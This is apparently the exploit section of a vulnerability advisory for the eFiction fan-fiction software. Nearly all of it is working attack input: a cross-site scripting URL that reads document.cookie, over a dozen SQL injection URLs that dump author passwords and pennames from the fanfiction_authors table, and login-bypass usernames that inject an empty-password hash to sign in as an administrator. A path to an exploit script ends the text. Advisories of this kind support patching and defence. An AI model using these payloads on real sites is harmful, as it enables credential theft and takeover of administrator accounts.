• info
• discussion
• exploit
• solution
• references

eFiction Multiple Input Validation Vulnerabilities

No exploit is required.

The following URI have been provided:

http://www.example.com/efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>

http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>'
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

http://www.example.com/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://www.example.com/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/*

http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*

http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*

http://www.example.com/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*

http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*

http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/*

http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM fanfiction_authors where level=1/*
password: [nothing]

username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories FROM fanfiction_authors where level=1/*
password: [nothing]

username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent FROM fanfiction_authors where level=1/*
password: [nothing]

• /data/vulnerabilities/exploits/efiction20_xpl.php